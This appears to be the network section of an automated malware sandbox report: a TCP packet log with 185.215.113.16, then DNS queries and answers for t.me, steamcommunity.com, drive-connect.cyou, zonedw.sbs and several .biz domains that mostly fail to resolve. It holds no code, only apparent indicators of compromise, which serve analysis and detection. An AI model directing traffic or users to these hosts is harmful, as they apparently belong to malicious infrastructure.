Dec 13, 2024 18:54:02.882716894 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.882755995 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.882786036 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.885001898 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.885056019 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.885215044 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.885286093 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.887629032 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.887682915 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.887778044 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.887825012 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.890294075 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.890343904 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.890377998 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.890424013 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.892503977 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.892550945 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.892617941 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.892661095 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.894990921 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.895051003 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.895117044 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.895154953 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.897497892 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.897542953 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.897614956 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.897653103 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.900002956 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.900043964 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.900098085 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.900135994 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.902512074 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.902555943 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.902576923 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.902621984 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.904992104 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.905035019 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.905078888 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.905118942 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.907527924 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.907568932 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.907613039 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.907653093 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.910054922 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.910100937 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.910182953 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.910229921 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.912549019 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.912590981 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.912697077 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.912736893 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.915091991 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.915133953 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.915280104 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.915343046 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.917562962 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.917610884 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.917669058 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.917714119 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.920012951 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.920057058 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.920217037 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.920268059 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.922591925 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.922636986 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.922638893 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.922684908 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.925143957 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.925195932 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.925277948 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.925324917 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.927563906 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.927583933 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.927623034 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.927654982 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.930159092 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.930210114 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.930284977 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.930335045 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.932558060 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.932615042 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.932713032 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.932760954 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.935023069 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.935074091 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.935175896 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.935221910 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.937571049 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.937617064 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.937654018 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.937704086 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.940000057 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.940048933 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.940165997 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.940212011 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.942569017 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.942615032 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.942797899 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.942847013 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.945626020 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.945637941 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.945698023 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.945698023 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.947633028 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.947688103 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.947792053 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.947841883 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:02.950273991 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:02.950325012 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.016938925 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.017009020 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.017102957 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.017158985 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.017565966 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.017608881 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.017822981 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.017872095 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.017960072 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.017999887 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.019864082 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.019912958 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.020040989 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.020087957 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.021898985 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.021954060 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.021965027 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.022006989 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.023926020 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.023983955 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.024034023 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.024086952 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.026385069 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.026443005 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.026478052 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.026529074 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.028718948 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.028774023 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.029019117 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.029073954 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.030478001 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.030531883 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.030546904 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.030605078 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.032325029 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.032377958 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.032423973 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.032473087 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.035896063 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.035908937 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.035919905 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.035932064 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.035948038 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.035985947 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.035986900 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.037552118 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.037615061 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.037703037 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.037750006 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.039333105 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.039400101 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.039464951 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.039510012 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.041276932 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.041327000 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.041423082 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.041467905 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.043004036 CET	80	49944	185.215.113.16	192.168.2.7
Dec 13, 2024 18:54:03.043056011 CET	49944	80	192.168.2.7	185.215.113.16
Dec 13, 2024 18:54:03.043142080 CET	80	49944	185.215.113.16	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 18:53:38.975454092 CET	192.168.2.7	1.1.1.1	0xb4d	Standard query (0)	drive-connect.cyou	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:39.255707026 CET	192.168.2.7	1.1.1.1	0x4501	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.023384094 CET	192.168.2.7	1.1.1.1	0xbb79	Standard query (0)	zonedw.sbs	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.299356937 CET	192.168.2.7	1.1.1.1	0xbfa9	Standard query (0)	se-blurry.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.522028923 CET	192.168.2.7	1.1.1.1	0xa0a	Standard query (0)	zinc-sneark.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.750677109 CET	192.168.2.7	1.1.1.1	0xce19	Standard query (0)	dwell-exclaim.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.966486931 CET	192.168.2.7	1.1.1.1	0x9aca	Standard query (0)	formy-spill.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:43.209697008 CET	192.168.2.7	1.1.1.1	0xd17c	Standard query (0)	covery-mover.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:43.439390898 CET	192.168.2.7	1.1.1.1	0x696a	Standard query (0)	dare-curbys.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:43.666183949 CET	192.168.2.7	1.1.1.1	0xc1d2	Standard query (0)	print-vexer.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:43.904931068 CET	192.168.2.7	1.1.1.1	0xad6d	Standard query (0)	impend-differ.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:44.363931894 CET	192.168.2.7	1.1.1.1	0x2bb	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:01.007330894 CET	192.168.2.7	1.1.1.1	0xd70c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:01.007817030 CET	192.168.2.7	1.1.1.1	0x2b2a	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 13, 2024 18:54:22.552509069 CET	192.168.2.7	1.1.1.1	0x26f6	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:22.720777035 CET	192.168.2.7	1.1.1.1	0xcc0a	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 13, 2024 18:54:24.999808073 CET	192.168.2.7	1.1.1.1	0x7e5d	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.000121117 CET	192.168.2.7	1.1.1.1	0x522f	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.139341116 CET	192.168.2.7	1.1.1.1	0xfab7	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.144614935 CET	192.168.2.7	1.1.1.1	0xd0fb	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:25.277293921 CET	192.168.2.7	1.1.1.1	0x1a91	Standard query (0)	youtube.com	28	IN (0x0001)	false
Dec 13, 2024 18:54:25.287514925 CET	192.168.2.7	1.1.1.1	0x7eab	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 13, 2024 18:54:40.467751026 CET	192.168.2.7	1.1.1.1	0x9da5	Standard query (0)	fightlsoser.click	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:43.716511965 CET	192.168.2.7	1.1.1.1	0x975d	Standard query (0)	se-blurry.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:43.989775896 CET	192.168.2.7	1.1.1.1	0x4dfa	Standard query (0)	zinc-sneark.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.143213987 CET	192.168.2.7	1.1.1.1	0x4fc1	Standard query (0)	dwell-exclaim.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.285131931 CET	192.168.2.7	1.1.1.1	0x94e4	Standard query (0)	formy-spill.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.425113916 CET	192.168.2.7	1.1.1.1	0x650d	Standard query (0)	covery-mover.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.581773043 CET	192.168.2.7	1.1.1.1	0x6e91	Standard query (0)	dare-curbys.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.733957052 CET	192.168.2.7	1.1.1.1	0xfae5	Standard query (0)	print-vexer.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:44.913357973 CET	192.168.2.7	1.1.1.1	0xf3c4	Standard query (0)	impend-differ.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:45.126140118 CET	192.168.2.7	1.1.1.1	0x2c6b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:59.623533010 CET	192.168.2.7	1.1.1.1	0xc3d1	Standard query (0)	se-blurry.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:59.768629074 CET	192.168.2.7	1.1.1.1	0xc007	Standard query (0)	zinc-sneark.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:54:59.912133932 CET	192.168.2.7	1.1.1.1	0x730a	Standard query (0)	dwell-exclaim.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.062617064 CET	192.168.2.7	1.1.1.1	0x9d36	Standard query (0)	formy-spill.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.201817989 CET	192.168.2.7	1.1.1.1	0x6d5a	Standard query (0)	covery-mover.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.343394041 CET	192.168.2.7	1.1.1.1	0x61bf	Standard query (0)	dare-curbys.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.489130020 CET	192.168.2.7	1.1.1.1	0xd50b	Standard query (0)	print-vexer.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.636229038 CET	192.168.2.7	1.1.1.1	0xbd8d	Standard query (0)	impend-differ.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:00.872314930 CET	192.168.2.7	1.1.1.1	0x9b0b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:13.577498913 CET	192.168.2.7	1.1.1.1	0x4a54	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 13, 2024 18:55:13.784271002 CET	192.168.2.7	1.1.1.1	0x275e	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:15.276335001 CET	192.168.2.7	1.1.1.1	0xc8e3	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:42.969775915 CET	192.168.2.7	1.1.1.1	0xd170	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:44.309082031 CET	192.168.2.7	1.1.1.1	0x9eb8	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:44.454984903 CET	192.168.2.7	1.1.1.1	0xe770	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:44.636710882 CET	192.168.2.7	1.1.1.1	0xeaf8	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:48.661717892 CET	192.168.2.7	1.1.1.1	0x6ea2	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:55:48.957120895 CET	192.168.2.7	1.1.1.1	0x6ea2	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:57:58.563195944 CET	192.168.2.7	1.1.1.1	0x736a	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:57:59.901308060 CET	192.168.2.7	1.1.1.1	0xeb47	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:16.852662086 CET	192.168.2.7	1.1.1.1	0x2645	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:16.852771997 CET	192.168.2.7	1.1.1.1	0x7dd1	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:23.668617010 CET	192.168.2.7	1.1.1.1	0x280d	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:23.668751001 CET	192.168.2.7	1.1.1.1	0x952c	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:31.167820930 CET	192.168.2.7	1.1.1.1	0xc94a	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:31.168018103 CET	192.168.2.7	1.1.1.1	0x95dc	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:33.479127884 CET	192.168.2.7	1.1.1.1	0x100f	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:33.479234934 CET	192.168.2.7	1.1.1.1	0x1f7	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Dec 13, 2024 18:58:35.826517105 CET	192.168.2.7	1.1.1.1	0x87e0	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.826636076 CET	192.168.2.7	1.1.1.1	0xf3f8	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:35.826853991 CET	192.168.2.7	1.1.1.1	0x5b84	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.826956987 CET	192.168.2.7	1.1.1.1	0x9406	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:35.832772017 CET	192.168.2.7	1.1.1.1	0xc2d3	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:35.832879066 CET	192.168.2.7	1.1.1.1	0xe721	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:36.000310898 CET	192.168.2.7	1.1.1.1	0xbcca	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.000394106 CET	192.168.2.7	1.1.1.1	0xa935	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:36.003854036 CET	192.168.2.7	1.1.1.1	0x872c	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.004601955 CET	192.168.2.7	1.1.1.1	0x1849	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:36.139942884 CET	192.168.2.7	1.1.1.1	0x256b	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.140042067 CET	192.168.2.7	1.1.1.1	0xe15f	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Dec 13, 2024 18:58:36.281639099 CET	192.168.2.7	1.1.1.1	0x3b68	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:58:36.281764030 CET	192.168.2.7	1.1.1.1	0x8fee	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Dec 13, 2024 19:00:19.830781937 CET	192.168.2.7	1.1.1.1	0xcf74	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:33.499573946 CET	192.168.2.7	1.1.1.1	0x8e1a	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:33.499684095 CET	192.168.2.7	1.1.1.1	0xe9f3	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 13, 2024 19:00:33.899295092 CET	192.168.2.7	1.1.1.1	0x8f46	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:33.899744034 CET	192.168.2.7	1.1.1.1	0x83ea	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Dec 13, 2024 19:00:34.512778997 CET	192.168.2.7	1.1.1.1	0x240	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 13, 2024 19:00:34.512996912 CET	192.168.2.7	1.1.1.1	0xdefb	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 18:53:39.393711090 CET	1.1.1.1	192.168.2.7	0x4501	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:39.479235888 CET	1.1.1.1	192.168.2.7	0xb4d	No error (0)	drive-connect.cyou		104.21.79.7	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:39.479235888 CET	1.1.1.1	192.168.2.7	0xb4d	No error (0)	drive-connect.cyou		172.67.139.78	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.428137064 CET	1.1.1.1	192.168.2.7	0xbb79	No error (0)	zonedw.sbs		116.203.10.31	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.519395113 CET	1.1.1.1	192.168.2.7	0xbfa9	Name error (3)	se-blurry.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.747864008 CET	1.1.1.1	192.168.2.7	0xa0a	Name error (3)	zinc-sneark.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:42.963697910 CET	1.1.1.1	192.168.2.7	0xce19	Name error (3)	dwell-exclaim.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:43.206535101 CET	1.1.1.1	192.168.2.7	0x9aca	Name error (3)	formy-spill.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:43.436589003 CET	1.1.1.1	192.168.2.7	0xd17c	Name error (3)	covery-mover.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 18:53:43.664679050 CET	1.1.1.1	192.168.2.7	0x696a	Name error (3)	dare-curbys.biz	none	none	A (IP address)	IN (0x0001)	false
